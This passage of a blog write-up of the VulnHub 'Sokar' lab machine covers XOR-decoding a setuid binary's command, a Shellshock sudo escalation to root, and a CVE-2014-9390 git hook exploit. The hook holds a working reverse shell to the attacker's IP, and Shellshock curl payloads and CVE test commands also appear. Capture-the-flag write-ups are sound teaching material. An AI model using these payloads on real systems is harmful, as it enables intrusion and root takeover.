 a4e: bf 01 00 00 00       mov    edi,0x1
 a53: b8 00 00 00 00       mov    eax,0x0
 a58: e8 d3 fc ff ff       call   730 <__printf_chk@plt>
 a5d: 48 8b 55 e8           mov    rdx,QWORD PTR [rbp-0x18]
 a61: 64 48 33 14 25 28 00 xor    rdx,QWORD PTR fs:0x28
 a68: 00 00 
 a6a: 74 05                 je     a71 <main+0x182>
 a6c: e8 0f fd ff ff       call   780 <__stack_chk_fail@plt>
 a71: 48 8d 65 f0           lea    rsp,[rbp-0x10]
 a75: 5b                   pop    rbx
 a76: 41 5c                 pop    r12
 a78: c9                   leave  
 a79: c3                   ret    
 a7a: 90                   nop
 a7b: 90                   nop
 a7c: 90                   nop
 a7d: 90                   nop
 a7e: 90                   nop
 a7f: 90                   nop
 
So, I took a look at what all was stored during those mov DWORD_PTR calls:
 
>>> s="\x3b\x3a\x3c\x66\x27\x20\x2b\x66\x3d\x20\x2e\x66\x26\x25\x2a\x69\x3a\x69\x2c\x27\x66\x73\x21\x3a\x26\x26\x3b\x66\x26\x3a\x09\x3d\x64\x3b\x28\x22\x73\x3f\x2c\x2d\x26\x26\x3b\x66\x2c\x3a\x66\x3d\x3d\x2c\x3b\x2a\x26\x3b\x39\x64\x3d\x2a\x2c\x23\x27\x24\x66\x69\x2c\x3a\x66\x3d\x3d\x2c\x3b\x2a\x26\x3b\x39\x64\x3d\x2a\x2c\x23"
>>> s
';:<f\' +f= .f&%*i:i,\'fs!:&&;f&:\t=d;("s?,-&&;f,:f==,;*&;9d=*,#\'$fi,:f==,;*&;9d=*,#'
 
What about doing a byte by byte XOR against 0x49?
 
>>> for x in s: o = o + chr(ord(x)^73)
... 
>>> o
'/usr/bin/git clone ssh://root@sokar-dev:/root/secret-project /mnt/secret-project/'
>>>
------------------------
This is getting too deep.  I'll have to figure out the canary and all kinds of stuff to do a buffer overflow.  Maybe figure out a way to trick git into running a script I write while running as root.  And, I forgot about shellshock working through environment variables.  Tried bynarr and got success!
 
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 
User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime
 
[bynarr@sokar ~]$ sudo PS1="() { :; }; /bin/sh" /home/bynarr/lime
sudo PS1="() { :; }; /bin/sh" /home/bynarr/lime
sh-4.1# whoami
whoami
root
sh-4.1# ls /root
ls /root
build.c  flag
sh-4.1# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|
 
=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================
sh-4.1# cat /root/build.c
cat /root/build.c
#include <stdio.h>
#include <string.h>
 
void encryptDecrypt(char *input, char *output) {
        char key[] = {'I'};
 
        int i;
        for(i = 0; i < strlen(input); i++) {
                output[i] = input[i] ^ key[i % (sizeof(key)/sizeof(char))];
        }
}
 
int main (int argc, char *argv[]) {
 
        char baseStr[] = "f<:;f+ 'f. =i*%&',i::!sff;&&= :&\"(;d-,?sf;&&=f:,*;,=d9;&#,*=if$'=f:,*;,=d9;&#,*=f";
 
char a[2];
char b[2] = "Y";
 
printf("Build? (Y/N) ");
gets(a);
 
if( strcmp(a,b) == 0) {
 
       char encrypted[strlen(baseStr)];
       encryptDecrypt(baseStr, encrypted);
setreuid(0, 0);
       system(encrypted);
}
 
else
 
printf("OK :(\n");
 
}
sh-4.1# 
----------------------------
Try getting root from apophis too.
 
Ok, we know git is run from the suid program /home/apophis/build.  I checked the version, 2.2.0, and looked for vulnerabilities.  I found CVE-2014-9390 and https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/
 
For this attack to work though, the file system has to be case insensitive.
 
curl -A '() { :;}; echo -en "\n\n$(/bin/mount)\n\n"' 192.168.56.101:591/cgi-bin/cat |grep -v Permission |grep -v proc
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1454    0  1454    0     0   159k      0 --:--:-- --:--:-- --:--:--  177k
 
/dev/sda1 on / type ext4 (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /mnt type vfat (rw,uid=501,gid=502)
 
Content-type: text/html
 
<pre>
 
So, looks like I can create a command file for git to execute, and it's executing suid.  On a kali machine, I created a git repository called secret-project and added a directory .Git/hooks.  In .Git/hooks I created a file post-checkout, and made it executable.
 
mkdir secret-project
cd secret-project
git init
mkdir .Git
mkdir .Git/hooks
cd .Git/hooks
vim post-checkout
cat post-checkout
 
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.103/4444 0>&1
 
chmod +x post-checkout
git add .
git commit -m firsttry
 
Now I set up dnsmasq on kali. 
dnsmasq --address=/socar-dev/192.168.56.103/22
service ssh start
nc -nlvp 4444
 
Back at the sokar device,
 
/home/apophis/build
 
Nothing happened.
 
Go back to root under bynarr and take a look at firewall rules, just to short circuit.
 
[bynarr@sokar ~]$ sudo PS1="() { :;}; /bin/sh" /home/bynarr/lime
sudo PS1="() { :;}; /bin/sh" /home/bynarr/lime
sh-4.1# iptables -L
iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             anywhere            state RELATED,ESTABLISHED 
DROP       icmp --  anywhere             anywhere            
ACCEPT     all  --  anywhere             anywhere            
ACCEPT     tcp  --  anywhere             anywhere            state ESTABLISHED tcp spt:ssh 
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED tcp dpt:591 
ACCEPT     udp  --  anywhere             anywhere            udp spt:domain 
 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
 
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED owner UID match root tcp dpt:ssh 
ACCEPT     udp  --  anywhere             anywhere            udp dpt:domain owner UID match root 
ACCEPT     tcp  --  anywhere             anywhere            state ESTABLISHED tcp spt:591 
ACCEPT     tcp  --  anywhere             anywhere            state NEW,ESTABLISHED owner GID match bynarr tcp dpt:51242 
DROP       all  --  anywhere             anywhere            
sh-4.1# 
 
So, root can get an outbound only on tcp port 22 and dns port udp 53.  I'll change my post-checkout and such to confirm the exploit.
 
[apophis@sokar bynarr]$ /home/apophis/build
/home/apophis/build
Build? (Y/N) Y
Y
Cloning into '/mnt/secret-project'...
root@sokar-dev's password: xxxxxxxxx
 
remote: Counting objects: 52, done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 52 (delta 1), reused 0 (delta 0)
Receiving objects: 100% (52/52), done.
Resolving deltas: 100% (1/1), done.
Checking connectivity... done.
 
And on kali:
 
root@kali:~# nc -nlvp 22
listening on [any] 22 ...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.101] 37753
[root@sokar secret-project]# cat /root/flag
cat /root/flag
                0   0
                |   |
            ____|___|____
         0  |~ ~ ~ ~ ~ ~|   0
         |  |   Happy   |   |
      ___|__|___________|___|__
      |/\/\/\/\/\/\/\/\/\/\/\/|
  0   |    B i r t h d a y    |   0
  |   |/\/\/\/\/\/\/\/\/\/\/\/|   |
 _|___|_______________________|___|__
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
|                                   |
|     V  u  l  n  H  u  b   ! !     |
| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |
|___________________________________|
 
=====================================
| Congratulations on beating Sokar! |
|                                   |
|  Massive shoutout to g0tmi1k and  |
| the entire community which makes  |
|         VulnHub possible!         |
|                                   |
|    rasta_mouse (@_RastaMouse)     |
=====================================
 
Additional information:
 
There's a wiki about shellshock that goes into several related attacks.  It's at https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29
 
git vulnerability up until 2.2.1
 
Sokar was running an older bash:
bash -help
bash -help
GNU bash, version 4.1.2(1)-release-(x86_64-redhat-linux-gnu)
 
Patches were made by bash43-027 per the wiki.  Take a look at the other CVE's as they relate to CGI (what worked here through apache), DHCP, and a couple of other avenues.  Some vulnerabilities from the wiki (quoted) with runs on the sokar machine to test:
 
Initial report (CVE-2014-6271)
 
This original form of the vulnerability involves a specially crafted environment variable containing an exported function definition, followed by arbitrary commands. Bash incorrectly executes the trailing commands when it imports the function.[39] The vulnerability can be tested with the following command:
 
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
 
[root@sokar bynarr]# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
<'() { :;}; echo vulnerable' bash -c "echo this is a test"                   
vulnerable
this is a test
 
In systems affected by the vulnerability, the above commands will display the word "vulnerable" as a result of Bash executing the command "echo vulnerable", which was embedded into the specially crafted environment variable named "x".[8][40]
 
 
CVE-2014-7169
 
On the same day the original vulnerability was published, Tavis Ormandy discovered this related bug[31] which is demonstrated in the following code:
 
env X='() { (a)=>\' bash -c "echo date"; cat echo
 
[root@sokar bynarr]# env X='() { (a)=>\' bash -c "echo date"; cat echo
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Tue Jan 26 20:30:10 GMT 2016
[root@sokar bynarr]# cat echo
cat echo
Tue Jan 26 20:30:10 GMT 2016
[root@sokar bynarr]# 
 
On a vulnerable system this would execute the command "date" unintentionally.[31]
CVE-2014-7186
 
Florian Weimer and Todd Sabin found this bug,[8][38] which relates to an out-of-bounds memory access error in the Bash parser code.[44]
 
An example of the vulnerability, which leverages the use of multiple "<<EOF" declarations:
 
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
 echo "CVE-2014-7186 vulnerable, redir_stack"
[root@sokar bynarr]# bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
 echo "CVE-2014-7186 vulnerable, redir_stack"
<<<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||       
>  echo "CVE-2014-7186 vulnerable, redir_stack"
Segmentation fault
CVE-2014-7186 vulnerable, redir_stack
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
CVE-2014-7187
 
Also found by Florian Weimer,[8] this is an off-by-one error in the Bash parser code, allowing out-of-bounds memory access.[45]
 
An example of the vulnerability, which leverages the use of multiple "done" declarations:
 
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
[root@sokar bynarr]# (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
<done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"         
bash: line 129: syntax error near `x129'
bash: line 129: `for x129 in ; do :'
CVE-2014-7187 vulnerable, word_lineno
 
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno". This test requires a shell that supports brace expansion.[46]

Most Recent Articles

First bit::

This is a writeup of the format string vulnerability in level 4 of the 64bitprimer VM from vulnhu

First bit::

Installation of the software to make a yubikey 4 work in FIDO U2F mode on Debian Jessie i386

First bit::

Lesson(s) learned

First bit::

This one stumped me. Overall, it was a great competition for me as I got to learn a whole lot of new things. I had never worked on a Mac, other than as a user, had never used Hopper, lldb or any of the other tools for reversing on a Mac, and haven't got any experience in the Objective C/Swift framework.

First bit::

4 rounds, lots of debugging

Videos

Categories: Network security, Videos
First bit::

Explains the workings of a DMZ, walks through setting up and testing of a DMZ in a virtual machine lab environment

Categories: Network security, Videos
First bit::

In this video I go through the process of setting up an SSH tunnel to hide an IP and also setting

Categories: Exploits, Videos
First bit::

Useful for someone who is interested in what a buffer overflow is. Does not go into the details of development, just explains generally and demonstrates the use of one.

Categories: Exploits, Videos
First bit::

a demonstration of a vulnerability discovered and published by Muts in 2004, exploited on a Windows XP SP3 machine using Python, Immunity Debugger, and Metasploit.

Categories: Network security, Videos
First bit::

In this video I demo some simple iptables rules and show them how to perform network traffic analysis to test them out.